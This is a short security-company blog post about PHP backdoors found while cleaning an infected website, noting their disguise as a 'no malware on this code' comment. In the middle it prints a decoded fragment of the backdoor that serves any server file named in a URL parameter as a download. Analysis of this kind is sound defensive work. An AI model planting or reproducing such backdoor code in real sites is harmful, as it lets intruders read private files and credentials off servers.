Backdoor: No malware on this code, you can check it by yourself

We were cleaning up an infected web site a few days ago and it had multiple backdoors. They all started like that:

<?php
// ketek90@gmail.com
// no malware on this code, you can check it by yourself ; – )

We see this very often, where malware authors put valid headers and messages to try to disguise what it does, but never in such a direct way. I guess it just made the job easier for us…

You can see the full backdoor here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=1c7166d7336a50e52175224878466616

As far as what the code does, it decodes to a backdoor:

if(isset($_GET['dl']) && ($_GET['dl'] != “”)){ $file = $_GET['dl']; $filez = @file_get_contents($file); header(“Content-type: application/octet-stream”); header(“Content-length: “.strlen($filez)); header(“Content-disposition: attachment; filename=\””.basename($file).”\”;”); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != “”)){ $file = $_GET['dlgzip'];…


To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.